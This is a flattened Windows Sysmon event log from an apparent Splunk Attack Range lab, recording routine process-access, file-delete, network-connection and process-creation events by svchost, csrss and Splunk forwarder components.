11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.827{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000223868Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:55.647{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6D0FC4BCBCAD53B9821A9C6E69E1A8B,SHA256=2AE4A102826CF4A7AE35600EF08C7397C3FFCC2D1D2C7BCDDA8B47AF988B9F2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:55.258{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34D1C42E380817200883FC8B5B4EFA82,SHA256=94A71897C0DDD84CE4FA283AC7B9D9F61BF56B2EA882EDBBBEA85EB428B6FE9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223869Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:56.694{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4A2315D01AECED91AB91C0D73C6A17F,SHA256=EA2E70F0514237D25DFBCF1175E592A8CBB0F25AE8C3BC7EED7E85A833CDB697,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:54.552{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49686-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000300058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:56.276{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77DBCECF91F0919C4A297E9F616AB55E,SHA256=D5D0D0DC5043D9843DE1827920E8138F71DC3D2738D16A259774714C571E26E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223871Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:57.808{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-173MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223870Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:57.696{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC46C8D67D5AF1317763F5BAF5DC7F90,SHA256=ABADAF89E5A9570EDCFDB010F76D5311318B4C156CE9A5920224B0749D7ABE33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:57.297{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3219729A03FF70D24919CA852D913E1,SHA256=EACC9055B9D2686E053CCA535894277197E05E9125DF3DC50F0E441F2789CBB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223874Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:58.820{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-174MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223873Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:55.543{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51814-false10.0.1.12-8000- 23542300x8000000000000000223872Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:58.710{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CD96F65CFB97B1EB63972EA2C3000FA,SHA256=C5A87C58C8D4DA56C3D2B2F59298D5E3940085F92DD1957C3D681BC0EAC9E566,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:58.312{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A11E4A780010266EBA4EC90640B0D69,SHA256=AE72972926D62727E6CD8A9EE3E84DD08A7FD336F68E21A1DD13108F7A7D6192,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223875Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:59.725{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD50026D301858EFD611E224F2A8EEFE,SHA256=B332C8078551F1DE20C97539339FCB6D5C8D7E7C97D426DD9D272E7CC74E93BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:59.313{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29F68BD563C439D1592B03960DFC6BE0,SHA256=3D31074610D1127820B2FBD452B8072A404E70D98215798BD8A62CA32E8D79F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223876Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:00.960{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5CD3616997C392D1AF77FF656AEFF05,SHA256=0756B83B190F4B17CCA77305D166EDBC65DAB1704266E85D656A66C43DFD22B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:00.327{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F4CAE229559B4F124A3050C3217CA1B,SHA256=BF3DDAE60FEE524D5B209FD61A44A301BF035146B323B0DEA9B0E25D0E9884BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:59.687{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49687-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000300072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:01.495{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1AF5-6216-9307-000000003802}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:01.495{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:01.495{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:01.495{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:01.495{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:01.494{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1AF5-6216-9307-000000003802}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000300066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:01.493{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1AF5-6216-9307-000000003802}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:01.491{C8EA50B7-1AF5-6216-9307-000000003802}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000300064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:01.342{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D9492DC99228A4DED610C0B4601C90F,SHA256=E96E44410287146BBB968811AEE00C8F5961B89DCC651B97401C9F8082051B3A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:02.516{C8EA50B7-1AF6-6216-9407-000000003802}63566080C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000300082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:02.385{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01C55B9F3BD22F82AA61FF7B9FE8E412,SHA256=A1B75197175467F91C50804F4A4962E333F81390B7D189A17476CF3BA53D2356,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223877Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:02.194{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E08D2EC11ED289A5922CA2376C36D4D8,SHA256=CD248E360C576A993D9F3AD6A0F032563AAB60F6FD68232678AFA891F42992D2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 